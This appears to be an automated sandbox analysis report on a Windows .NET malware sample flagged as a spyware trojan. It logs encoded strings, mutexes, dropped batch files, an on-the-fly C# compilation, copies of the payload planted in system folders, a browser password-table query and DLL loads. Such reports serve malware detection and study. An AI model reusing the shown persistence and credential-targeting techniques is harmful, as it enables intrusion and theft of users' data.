rv23uB66kfpROoPu0dT3jMlQpGYQhUi91VC/rEpIea42srGpZ2hyjKMW7LpFvKDPcF3R0JnNchAkF8VuLP6t0+frDhI2vAA0+zIqZz63CmQMmpbg5Amg+JdTmQj5+8l/J+ahHffrpTYlmHbTPRkRfaCylgLOG7oyq7y6aQMDL0jl/q/PndBJccUCNRJEtzHYv60Q8BPnZTPbPCCAS9hqPn5mpYKgZHo9maRBg+tjhZBvyQNvNfilPgsTekdPLmFN5qovqYX6s/EBU4S6k7zmXI4cn91RR+a4K6DWWXMKs8CnuwQeTF87KjXabk1DdO9oCmfsKASNgHR9bmZ/h3uCBz51SjKqkLprDGdp2Sx633lbayQopmpA4oRx6Um4PIhaILge6a+9R2MFNY8W8RRS1li2QppK26kaeO3Xs8PaOLD2vgOyyw1D0sKW4KlFLGkqkmWqX9FJd9lYmQcAqqUhaVj/YuCMnMtofECaKMic/6PCtDk0EnQlFziP6PoNO8b89heFnha/Etao0IegEDJYcFCxQxImfG2OgBwRouKgm8b2JwR9PcamcRdxO7KTmhK2ibwd72oBcqJbrnZiIS0fDY6AbLCl4pVRvAXZho1UJ5Kf2vJLqqy2HBpzLDjIsH7dMW0DOp5Uxm9b8tJ008y4ujoo71MIpbVjJ9Rp8q6BjLTijqZPD7F4y5jwCPNDJukrbwhxq1arSEk0QFYvbo/51pd08oHYA7E5us3kXdogwuu+CKLiP0aj7WFIjGnrkJB1t9xV7zvDssoGz018n7Z2+9bEqPM96YfgFQZQzdkUZhwTfD0gTE1AuGqSdFtwI++CCWZu2bFcQso5MnC3tr2pjDy5UK7V2WnrGUS2AHHSAZxgIgbQOXhFtM/YGJH2v13C/suH4hDPJ2d6xB0/qjkjud39q85pke0kGq+mCFRfLKsc0ruHZmOJ1Xklxhyrg6zkSivdUKz7z8HnCy31sfLPg03awiooA+0on5/MIaw0wm/JVj6WfdrSjkJvEZwTdarksWZPPLjdIydPSpEBm7MkIRWkfmtLj3/LJFzhHARroO5kFg0yIvvLQfoTwA1EeFhCJ9lXDyq4QPBVVXN826ot4FV+m/kry2g8otRrHgLVRn45oxtLLBfyrSjX
Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, x2I.cs	Base64 encoded string: 'K72yg8VTTAqypUUQmbndyurSCH4ntoLKM25fvhnp28WzYMU/3ckrlIytxv+guW6fkJ8eHEDtFRRBFPoujmYvFtazLtTCE2SsTNRaxEcUrMGsBHh+lzn+LBs5B5icO/uHO5t00vn9Ej7oIMifRx2EWQ=='

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@25/342@1/1

Source: C:\Users\user\Desktop\QMT2731i8k.exe

File created: C:\Users\user\Desktop\TtUAGVJK.log

Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-fzODLxzHyrEEVr6DlLbF

Source: C:\Users\user\Desktop\QMT2731i8k.exe

File created: C:\Users\user\AppData\Local\Temp\w5dfstyj

Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bsHDGyqA5r.bat"

Source: QMT2731i8k.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QMT2731i8k.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\QMT2731i8k.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: TlsUOSFF1C.8.dr, w2zsVpIJqT.8.dr, 6Q7BWr8ojD.8.dr, N4iinhv2Wy.8.dr, SfUwsKesX7.8.dr, kgUgSEhyiR.8.dr, csvpIFdTas.8.dr, IzBAOnOBY4.8.dr, 8MagEFysQE.8.dr, kGYEk8foHp.8.dr, tjWGE1v35R.8.dr, xMS6d1eUVF.8.dr, BENJxDbJVt.8.dr, NnWmGqjhhd.8.dr, JC4iX1iCZE.8.dr, ethjl0zMO7.8.dr, sKwPqvUslj.8.dr, UKQ8gtHK3Z.8.dr, tWJyG1J4dN.8.dr, 2NaZoqksUl.8.dr, yNtbhk7UUf.8.dr, gcUyIEvZVa.8.dr, b3c0HtmuPh.8.dr, 4WN0wcQ9Xl.8.dr, U5C5xlcPYs.8.dr, KtK2uzvsGu.8.dr, ERNja17Rj6.8.dr, Mm4S5gkrd9.8.dr, QmxgbYIuQY.8.dr, Wv8sadDUSj.8.dr, Wsk0srhpVe.8.dr, O9IQHf1dXw.8.dr, a6F09qdrMQ.8.dr, uiTvOWKgZ7.8.dr, 2vSRJ5zhJi.8.dr, mbqYf3ZpAi.8.dr, Bdo0o3TXbw.8.dr, HnH8PRya4N.8.dr, PythLN3ZAy.8.dr, eNsVPHnaN9.8.dr, r15toO76FV.8.dr, jjBlY3W5G3.8.dr, KbEcXrV3yE.8.dr, 4atzA7SOX4.8.dr, CSWbzraXxM.8.dr, ECDBzjL4E5.8.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: QMT2731i8k.exe	ReversingLabs: Detection: 68%
Source: QMT2731i8k.exe	Virustotal: Detection: 59%

Source: C:\Users\user\Desktop\QMT2731i8k.exe

File read: C:\Users\user\Desktop\QMT2731i8k.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\QMT2731i8k.exe "C:\Users\user\Desktop\QMT2731i8k.exe"
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES88DB.tmp" "c:\Windows\System32\CSCD6A0005F729947378317C8DDF47B6938.TMP"
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bsHDGyqA5r.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe "C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe"
Source: unknown	Process created: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe "C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe"
Source: unknown	Process created: C:\Users\user\Desktop\QMT2731i8k.exe "C:\Users\user\Desktop\QMT2731i8k.exe"
Source: unknown	Process created: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe "C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe"
Source: unknown	Process created: C:\Users\user\Desktop\QMT2731i8k.exe "C:\Users\user\Desktop\QMT2731i8k.exe"
Source: unknown	Process created: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe "C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe"
Source: unknown	Process created: C:\Users\user\Desktop\QMT2731i8k.exe "C:\Users\user\Desktop\QMT2731i8k.exe"
Source: unknown	Process created: C:\Recovery\qioiNOJzhriMVnsRuLz.exe "C:\Recovery\qioiNOJzhriMVnsRuLz.exe"
Source: unknown	Process created: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe "C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe"
Source: unknown	Process created: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe "C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe"
Source: unknown	Process created: C:\Users\user\Desktop\QMT2731i8k.exe "C:\Users\user\Desktop\QMT2731i8k.exe"
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bsHDGyqA5r.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES88DB.tmp" "c:\Windows\System32\CSCD6A0005F729947378317C8DDF47B6938.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe "C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: mscoree.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: apphelp.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: version.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: uxtheme.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: wldp.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: amsi.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: userenv.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: profapi.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: windows.storage.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptsp.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: rsaenh.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptbase.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: amsi.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: sspicli.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: mscoree.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: version.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: uxtheme.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: wldp.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: amsi.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: userenv.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: profapi.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: windows.storage.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptsp.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: rsaenh.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptbase.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: amsi.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: cryptsp.dll
